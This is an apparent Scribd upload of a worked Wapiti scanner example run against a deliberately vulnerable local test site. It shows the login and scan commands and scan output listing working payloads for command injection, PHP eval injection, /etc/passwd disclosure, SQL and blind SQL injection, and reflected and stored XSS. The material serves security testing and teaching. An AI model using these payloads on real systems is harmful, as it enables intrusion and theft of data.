Scribd
Upload
2K views5 pages

Wapiti Example

The document describes using various tools like wapiti-getcookie and wapiti to scan a vulnerable website located at http://127.0.0.1/vuln/ for security vulnerabilities. The scan found vulnerabilities like command injection, file disclosure, SQL injection, XSS, and more across various scripts on the site. Detailed information is provided on how to exploit each vulnerability including any parameters or URLs that can be used for attacks.

Uploaded by

Stephan Gomes Higuti
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views5 pages

Wapiti Example

The document describes using various tools like wapiti-getcookie and wapiti to scan a vulnerable website located at http://127.0.0.1/vuln/ for security vulnerabilities. The scan found vulnerabilities like command injection, file disclosure, SQL injection, XSS, and more across various scripts on the site. Detailed information is provided on how to exploit each vulnerability including any parameters or URLs that can be used for attacks.

Uploaded by

Stephan Gomes Higuti
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json : bash-4.

2$ python bin/wapiti-getcookie /tmp/cookies.json http://127.0.0.1/vuln/lo gin.php <Cookie PHPSESSID=OLPNLIEBPEFELBIFGMKJEKOD for 127.0.0.1/> Please enter values for the following form: url = http://127.0.0.1/vuln/login.php username (default) : admin password (letmein) : secret <Cookie PHPSESSID=OLPNLIEBPEFELBIFGMKJEKOD for 127.0.0.1/> It can also be done with wapiti-cookie this way : python bin/wapiti-cookie /tmp/cookies.json http://127.0.0.1/vuln/login.php usern ame=admin password=secret Then, I scan the vulnerable website using the cookie and excluding the logout sc ript : bash-4.2$ wapiti http://127.0.0.1/vuln/ -c cookies.json -x http://127.0.0.1/vuln /logout.php Wapiti-2.3.0 (wapiti.sourceforge.net) Note ======== This scan has been saved in the file /home/audit/.wapiti/scans/127.0.0.1.xml You can use it to perform attacks without scanning again the web site with the " -k" parameter [*] Loading modules: mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htacces s, mod_blindsql, mod_permanentxss, mod_nikto [+] Launching module exec Command execution in http://127.0.0.1/vuln/exec/system.php via injection in the parameter host Evil url: http://127.0.0.1/vuln/exec/system.php?host=%3Benv Command execution in http://127.0.0.1/vuln/exec/passthru.php via injection in th e parameter host Evil url: http://127.0.0.1/vuln/exec/passthru.php?host=%3Benv Timeout occured in http://127.0.0.1/vuln/exec/shell_exec.php Evil url: http://127.0.0.1/vuln/exec/shell_exec.php?host=a%60sleep%20600%60 Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%3Benv PHP evaluation in http://127.0.0.1/vuln/exec/eval.php via injection in the param eter code Evil url: http://127.0.0.1/vuln/exec/eval.php?code=a%3Bexit%28base64_decode%28 %27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F [+] Launching module file Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%2Fetc%2Fpasswd Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/inclu de_get_simple.php via injection in the parameter f Evil url: http://127.0.0.1/vuln/include/include_get_simple.php?f=%2Fetc%2Fpass wd File disclosure vulnerability in include_path in http://127.0.0.1/vuln/include/r eadfile_get_simple.php via injection in the parameter f Evil url: http://127.0.0.1/vuln/include/readfile_get_simple.php?f=.depdb Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/inclu

de_get_post_conditional.php?id=2 via injection in the parameter f Evil request: POST /vuln/include/include_get_post_conditional.php?id=2 HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2 Content-Type: application/x-www-form-urlencoded f=%2Fetc%2Fpasswd [+] Launching module sql Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%BF%27%22%28 MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the para meter login Evil url: http://127.0.0.1/vuln/sql/login.php?login=%BF%27%22%28&password=test MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the para meter password Evil url: http://127.0.0.1/vuln/sql/login.php?login=test&password=%BF%27%22%28 MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter login Evil request: POST /vuln/sql/login_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post.php Content-Type: application/x-www-form-urlencoded login=%BF%27%22%28&password=letmein MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter password Evil request: POST /vuln/sql/login_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post.php Content-Type: application/x-www-form-urlencoded login=default&password=%BF%27%22%28 [+] Launching module xss XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get.php via injection in t he parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get.php?firstname=James&vuln=%3C%2F textarea%3E%3Cscript%3Ealert%28%27w3xanau7e6%27%29%3C%2Fscript%3E&lastname=Bond XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_text_script.php via in jection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_text_script.php?vuln=String.fro mCharCode%280%2Cwv503afd6b%2C1%29 XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_noscript.php via injec tion in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_noscript.php?vuln=%3C%2Ftextare a%3E%3C%2Fp%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28%27wfalvx3r3y%27% 29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php via inject ion in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php?vuln=%3C%2Ftextarea %3E%3Cscript%3Ealert%28%27wjl4df7rtf%27%29%3C%2Fscript%3E&id=2 XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_query_string.php via injec tion in the query string

Evil url: http://127.0.0.1/vuln/xss/xss_in_query_string.php?%3Cscript%3Ealert% 28%27w1jnjlqhnq%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_php_self.php via injection in the resource path Evil url: http://127.0.0.1/vuln/xss/xss_in_php_self.php/%3Cscript%3Ephpselfxss ()%3C/script%3E XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php v ia injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname= James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wrb6hruotv%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post.php via injection in the parameter vuln Evil request: POST /vuln/xss/xss_in_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/xss_in_post.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w1f18 1ucnr%27%29%3C%2Fscript%3E XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2F script%3E XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post_url.php?style=%22%3E% 3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E via injection in the parameter style Evil request: POST /vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28% 27wpk5q4ybjo%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/xss_in_post_url.php Content-Type: application/x-www-form-urlencoded username=Enter%20your%20username [+] Launching module blindsql Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php Evil url: http://127.0.0.1/vuln/exec/eval.php?code=sleep%287%29%231 Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injecti on in the parameter login Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=%27%20or%20sleep%287 %29%231&password=test Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_blind.php via injecti on in the parameter password Evil url: http://127.0.0.1/vuln/sql/login_blind.php?login=test&password=%27%20 or%20sleep%287%29%231 Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via in jection in the parameter login Evil request:

POST /vuln/sql/login_post_blind.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post_blind.php Content-Type: application/x-www-form-urlencoded login=%27%20or%20sleep%287%29%231&password=letmein Blind SQL vulnerability in http://127.0.0.1/vuln/sql/login_post_blind.php via in jection in the parameter password Evil request: POST /vuln/sql/login_post_blind.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/sql/login_post_blind.php Content-Type: application/x-www-form-urlencoded login=default&password=%27%20or%20sleep%287%29%231 [+] Launching module permanentxss Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27w1rc0mzxmd%27%29%3C%2F script%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_dire ct.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php Content-Type: application/x-www-form-urlencoded firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2F script%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get.php v ia injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get.php?firstname=James&l astname=Bond&vuln=%3Cscript%3Ealert%28%27we37lsoicn%27%29%3C%2Fscript%3E Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direc t.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname= James&lastname=Bond&vuln=wrb6hruotv Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direc t.php via injection in the parameter vuln Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname= James&lastname=Bond&vuln=wrb6hruotv Stored XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_resu lt_elsewhere_submit.php via injection in the parameter vuln Evil request: POST /vuln/xss/permanent_xss_in_post_result_elsewhere_submit.php HTTP/1.1 Host: 127.0.0.1 Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_result_elsewhere.php Content-Type: application/x-www-form-urlencoded

firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wewjm7d17s%27%29%3C%2F script%3E Report -----A report has been generated in the file /home/audit/.wapiti/generated_report Open /home/audit/.wapiti/generated_report/index.html with a browser to see this report.

You might also like